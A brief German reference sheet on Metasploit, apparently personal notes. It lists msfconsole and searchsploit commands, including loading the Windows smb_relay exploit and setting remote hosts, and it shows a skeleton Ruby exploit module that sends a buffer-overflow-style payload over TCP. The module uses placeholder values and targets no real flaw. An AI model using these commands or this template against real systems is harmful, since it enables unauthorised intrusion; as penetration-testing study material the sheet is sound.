Metasploit ist ein Framework für das automatisierte Ausführen von Exploits mit Scriptingfunktionen in Ruby. Siehe auch msfvenom.
service postgresql start msfdb init msfconsole [| armitage] use exploit/windows/smb/smb_relay show options|info # show running sessions sessions # Show running jobs jobs
exploitdb -u // update from git ls /usr/share/exploitdb // src searchsploit oracle windows remote
setg rhosts 192.168.0.1 // set rhosts globally
#MySampleModule class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'My sample Exploit', 'Description' => %q{ This file illustrates how to write a module. }, 'License' => 'UnLicense', 'Author' => ['mbrain'], 'References' => [ [ 'CVE', '1234-5678'], ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", }, 'Targets' => [ [ 'Windows XP/Vista/7/8', { 'Platform' => 'win', 'Ret' => 0x41424344 } ], ], 'DisclosureDate' => "Apr 1 2013", 'DefaultOptions' => { 'RPORT' => 80, 'RHOSTS' => '192.168.0.157' }, 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4444) # Beispieloption für den Remote-Port ]) end # Usually this include code for checking def check Exploit::CheckCode::Vulnerable end def run ... end def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = rand_text_alpha(1024) buf << [ target.ret ].pack('V') buf << payload.encoded sock.put(buf) sock.get_once handler end end